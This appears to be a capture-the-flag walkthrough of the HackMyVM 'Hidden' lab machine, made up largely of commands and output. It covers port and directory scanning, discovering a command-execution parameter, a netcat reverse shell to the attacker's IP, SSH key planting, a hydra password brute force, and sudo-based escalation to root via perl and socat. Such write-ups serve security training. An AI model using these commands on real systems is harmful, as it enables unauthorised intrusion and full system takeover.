Scan ports.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log sudo-0 | 0 [14:50:06]
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
| 256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
|_ 256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Level 1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan port 80.
cat 80.log fish-0 | 0 [19:39:15]
/index.html (Status: 200) [Size: 392]
Check index.html, found a png file and some hints.
<body>
<h1><center>Welcome to level 1</center></h1>
<center><img src="decodethis_pls.png"></center>
</body>
<!-- format xxx.xxxxxx.xxx -->
The png is tic-tac-toe Cipher. Decode it online.
Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.
gobuster dir -u http://sys.hidden.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o sys.hidden.hmv.log
...
/users (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
/members (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
/index.html (Status: 200) [Size: 282]
/weapon (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]
Scan /weapon.
gobuster dir -u http://sys.hidden.hmv/weapon -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o weapon.log
...
/index.html (Status: 200) [Size: 0]
/loot.php (Status: 200) [Size: 0]
Fuzz loot.php.
wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
...
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000008724: 200 1 L 3 W 54 Ch "hack"
Check RCE.
curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id' fish-0 | 0 [18:08:52]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Get reverse shell as www-data.
curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'
nc -nlvp 1234 fish-0 | 0 [18:05:18]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:39104.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hidden:/var/www/hidden/weapon$
Check sudo.
www-data@hidden:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on hidden:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on hidden:
(toreto) NOPASSWD: /usr/bin/perl
Get shell as toreto.
www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
sudo -u toreto perl -e 'exec "/bin/bash";'
toreto@hidden:~$ id
id
uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)
Upload id_rsa.pub in /home/toreto/.ssh, and rename it to authorized_keys, chmod 600.
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
Then login ssh as toreto.
ssh toreto@192.168.56.99 fish-0 | 0 [19:42:48]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
_________
/ ======= \
/ __________\
| ___________ |
| | - | |
| | | |
| |_________| | ___________________
\=____________/ Hack_My_VM - Hidden
/ """"""""""" \ -------------------
/ ::::::::::::: \
(_________________)
---------------------------------------------------
Congratulations!!! you have reached the last level!
Good Luck! ;)
---------------------------------------------------
Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$
In /home/atenea/.hidden, found a dic file.
toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt
Bruteforce password of atenea.
hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f nc-0 | 130 [19:29:55]
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv
Login as atenea, check sudo.
atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat
Get root shell using socat.
atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden
